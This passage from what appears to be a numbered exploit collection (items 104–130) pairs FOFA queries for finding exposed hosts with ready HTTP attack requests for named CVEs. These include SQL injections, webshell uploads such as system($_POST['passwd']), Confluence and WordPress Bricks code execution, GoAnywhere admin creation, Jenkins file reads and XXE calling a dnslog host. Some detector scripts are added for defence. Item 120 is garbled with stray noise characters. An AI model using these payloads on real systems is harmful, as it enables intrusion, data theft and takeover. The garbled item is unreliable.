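    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)
# Constructed benign request, in the plain and the deflated (redirect-binding) encodings.
BENIGN_XML = b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0"/>'
BENIGN_SAMLREQUEST = base64.b64encode(BENIGN_XML).decode()
BENIGN_DEFLATED = base64.b64encode(zlib.compress(BENIGN_XML)[2:-4]).decode()  # strip zlib header/trailer


def decode_saml_request(value: str) -> bytes:
    """base64-decode a SAMLRequest; inflate it when it is the raw-DEFLATE redirect form."""
    raw = base64.b64decode(value)
    if not raw.lstrip().startswith(b"<"):
        try:
            raw = zlib.decompress(raw, -15)  # -15: raw DEFLATE stream without zlib framing
        except zlib.error:
            pass
    return raw


def inspect_saml_xml(doc: bytes):
    """Return findings for the two shapes. The DTD check runs on the raw bytes before
    any parser sees the document, so an external entity is never resolved here."""
    if DTD_RE.search(doc):
        return ["dtd: DOCTYPE/ENTITY declaration in SAML XML (XXE shape, item 103)"]
    findings = []
    root = ET.fromstring(doc)
    for rm in root.iter(f"{{{DS_NS}}}RetrievalMethod"):
        uri = rm.get("URI", "")
        if EXTERNAL_URI_RE.match(uri):
            findings.append(f"ssrf: ds:RetrievalMethod fetches {uri} (item 102)")
    return findings


def inspect_saml_request(value: str):
    return inspect_saml_xml(decode_saml_request(value))


if __name__ == "__main__":
    print(inspect_saml_request(ITEM103_SAMLREQUEST))
    print(inspect_saml_xml(ITEM102_BODY))
    print(inspect_saml_request(BENIGN_DEFLATED))
```

A real SAML endpoint has no business resolving either a DTD or a remote KeyInfo reference; refusing documents with a DOCTYPE outright, before parsing, is the cheaper and safer of the two checks.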
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

The empty token is accepted, which is what makes the configuration readable without authentication.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1


106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The injection sits in the parameter name, not its value; the updatexml error message returns the result of version().

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

The body is raw bytes, shown above as a Python bytes literal (57 bytes once decoded, so Content-Length must be 57 rather than the length of the escaped literal). The CLI argument "@/etc/passwd" is expanded by the args4j parser into the contents of that file.

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The download side returns the file contents inside the command's error message and usage text:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

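The upload body above is a sequence of Jenkins CLI frames. As an added example (my code, not the article's or Jenkins'), the codec below decodes that byte string into frames, re-encodes it, and lists every argument that begins with "@", which is the args4j at-file expansion the page's output demonstrates. The framing is read off the page's bytes (4-byte big-endian payload length, 1-byte opcode, Java writeUTF string); the opcode names follow the order of the Jenkins PlainCLIProtocol enum as I recall it and are an assumption.

```python
import struct

# Opcode ordinals of the plain CLI protocol (names per the Jenkins PlainCLIProtocol enum
# order as I recall it: ARG=0, LOCALE=1, ENCODING=2, START=3; an assumption).
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}
OP_IDS = {name: op for op, name in OPS.items()}

# The page's upload body for item 109, as bytes (57 bytes, five frames).
PAGE_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def write_utf(text: str) -> bytes:
    """Java DataOutputStream.writeUTF: 2-byte big-endian length followed by the bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def encode_frames(frames) -> bytes:
    """frames: sequence of (opcode name, text). START carries no payload."""
    out = bytearray()
    for name, text in frames:
        payload = b"" if name == "START" else write_utf(text)
        out += struct.pack(">IB", len(payload), OP_IDS[name]) + payload
    return bytes(out)


def decode_frames(data: bytes):
    """Parse frames: int32 payload length, uint8 opcode, payload (writeUTF string or empty)."""
    frames, pos = [], 0
    while pos < len(data):
        if pos + 5 > len(data):
            raise ValueError("truncated frame header")
        length, op = struct.unpack_from(">IB", data, pos)
        pos += 5
        payload = data[pos:pos + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        pos += length
        text = ""
        if length >= 2:
            (n,) = struct.unpack_from(">H", payload, 0)
            text = payload[2:2 + n].decode("utf-8")
        frames.append((OPS.get(op, f"OP{op}"), text))
    return frames


def at_file_arguments(data: bytes):
    """Arguments that args4j would replace with a file's contents (the CVE-2024-23897 primitive)."""
    return [text[1:] for name, text in decode_frames(data) if name == "ARG" and text.startswith("@")]


if __name__ == "__main__":
    for frame in decode_frames(PAGE_BODY):
        print(frame)
    print("files read via @-expansion:", at_file_arguments(PAGE_BODY))
```

Run against the page's body this yields the frames ARG "help", ARG "@/etc/passwd", ENCODING "GBK", LOCALE "en_US", START, and a single at-file argument, /etc/passwd. The same decoder dropped in front of /cli traffic gives a precise detection: any ARG frame whose text starts with "@" on an unpatched controller.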
110. GoAnywhere MFT unauthenticated admin creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The "..;/" segment bypasses the path-based access control, so the initial account setup wizard is reachable again after installation; the form it returns creates an administrator account.

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce from the front page.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

The queryEditor string is evaluated as PHP; the command output is captured and returned through the exception message.

116. WordPress JS Support Ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

Note: this is a template ({{rand8}} is a random-name placeholder) and shows no file body; the PHP content goes after the Content-Type line of the support_custom_img part.

117. WordPress LayerSlider plugin SQL injection
Versions: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


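Items 105 to 107, 111, 112, 114 and 117 are all MySQL time-based (SLEEP) or error-based (updatexml) injections, carried either in the query string (sometimes in the parameter name itself, as in 106 and 107, or inside an array key as in 117) or in a JSON body (112). The detector below is an added example, not part of the article: it URL-decodes twice, scans the whole query string rather than individual parameter values, and walks JSON bodies value by value. The requests in the test are the page's own; the signature list and the decoding choices are mine.

```python
import json
import re
from urllib.parse import unquote_plus

# Signatures for the injection primitives used on this page (my selection, not exhaustive).
SQLI_PATTERNS = {
    "time-based sleep": re.compile(r"\bsleep\s*\(", re.IGNORECASE),
    "time-based benchmark": re.compile(r"\bbenchmark\s*\(", re.IGNORECASE),
    "error-based updatexml": re.compile(r"\bupdatexml\s*\(", re.IGNORECASE),
    "error-based extractvalue": re.compile(r"\bextractvalue\s*\(", re.IGNORECASE),
    "boolean tautology": re.compile(r"\b(?:and|or)\b\s*\(?\s*\d+\s*=\s*\d+", re.IGNORECASE),
}


def normalize(value: str) -> str:
    """Decode twice (catches %25xx double encoding) and collapse whitespace and '+'."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(value)))


def sqli_signatures(text: str):
    s = normalize(text)
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(s)]


def _walk_json(node, prefix=""):
    """Yield (dotted key, leaf value) pairs for every scalar in a JSON document."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _walk_json(v, f"{prefix}.{k}" if prefix else k)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _walk_json(v, f"{prefix}[{i}]")
    else:
        yield prefix, node


def inspect_request(target: str, body: str = "", content_type: str = ""):
    """Return [(location, [signature, ...]), ...]. The whole query string is scanned,
    so injections placed in a parameter *name* (items 106, 107) are caught too."""
    findings = []
    if "?" in target:
        hits = sqli_signatures(target.split("?", 1)[1])
        if hits:
            findings.append(("query", hits))
    if body:
        if "json" in content_type.lower():
            for key, value in _walk_json(json.loads(body)):
                hits = sqli_signatures(str(value))
                if hits:
                    findings.append((f"json:{key}", hits))
        else:
            hits = sqli_signatures(body)
            if hits:
                findings.append(("body", hits))
    return findings


if __name__ == "__main__":
    print(inspect_request("/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1"))
    print(inspect_request("/wp-json/notificationx/v1/analytics",
                          '{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}', "application/json"))
```

Scanning the raw query string is deliberate: a WAF rule that only inspects decoded parameter values misses items 106 and 107, where the updatexml() call is the parameter name and the value is just "1".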
118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field chooses the destination path, so the upload lands at /home/src.php regardless of the original filename. Access /home/src.php afterwards.
119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

The id field is blind, time-based: the response is delayed by five seconds only when the database name is three characters long.
# {# T2 Z3 x( N; H# V. W& k1 `# a; k' J7 [
" l3 u2 [( o# Y: u120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 j3 {- Y Q" WCVE-2024-1253
& K. U7 k( O9 M. q* @$ {, \FOFA:title="Smart管理平台"
; I3 O: `; t$ L: q: u D. XPOST /useratte/web.php? HTTP/1.1
/ D7 X6 |% C' z" x* RHost: ip:port+ i- s0 |0 G% n6 p m
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
5 v c2 X8 T6 A2 `User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
( d5 C! |$ D& }" K3 g- cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: s2 ~' i" u- @" ^5 e/ Y4 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; F8 f" l, {2 B( _2 K% M
Accept-Encoding: gzip, deflate% d+ v0 ^; P0 t$ G0 E% C
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
7 O* y& Z( b6 | Y' O$ P+ \Content-Length: 5972 ]" ]' Z7 v% L" S
Origin: https://ip:port
+ x3 Z r; I2 H- z& Q% ~9 yReferer: https://ip:port/sysmanage/licence.php: }3 l7 q! a7 O& [" e0 n
Upgrade-Insecure-Requests: 1
% o! D7 j6 s" [( e0 LSec-Fetch-Dest: document! n' Y/ u- X" Q; o; I1 Q
Sec-Fetch-Mode: navigate
9 V8 V" w: N, N NSec-Fetch-Site: same-origin6 v3 |* k$ E! C' g; ]7 `
Sec-Fetch-User: ?14 s1 P( ^+ K1 r' Q( G* B
Te: trailers
. a6 F1 V- t; P& W$ h+ M3 LConnection: close
" b( M) M$ i8 n9 d- g1 d4 j$ O" i3 I8 ?" W' k" o6 o7 D7 w
-----------------------------423289041236658752706300793287 ?3 p. K1 Q& p
Content-Disposition: form-data; name="file_upload"; filename="2.php": I" ^6 o+ d# z! L1 U. d
Content-Type: application/octet-stream
4 r' b1 L5 i1 `( S* T! x
2 j3 ~# M4 }. X8 A( Y/ w<?php phpinfo()?>
& y1 O! T& g: y% b-----------------------------423289041236658752706300793282 E- Z, Z9 Z& w# X6 s, U
Content-Disposition: form-data; name="id_type"' n& q- m- g5 X& L1 Z" W* ~0 \
" J6 b* d& U" x9 n, Y4 Y3 s3 t1 f2 P5 y; O: z: T/ m4 I! ^
-----------------------------42328904123665875270630079328$ M7 {% P: W! @2 V, c, I9 W( R
Content-Disposition: form-data; name="1_ck"
6 [" W& E+ }; U+ K# _0 x( R: V5 M
# \' P! u" ~4 {2 s0 c% M8 p1_radhttp
2 q2 {! ~; x7 B( }" m. j( ~* d1 n' S-----------------------------42328904123665875270630079328: d" p+ q' q- X% i
Content-Disposition: form-data; name="mode"
6 s! _' p3 |. y4 @
! }4 \0 s0 w n% @2 A& ^import* F, O( x2 u: B9 q7 Q
-----------------------------42328904123665875270630079328
h. ?/ D; z' |- j
# p# C& f, k/ ~% a* d
`6 @- s( q0 v% e6 c% e- ^6 c文件路径/upload/2.php
" N! ~ V, |3 S1 e& w+ j( f) Z9 u+ s" [8 K. g" A
121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
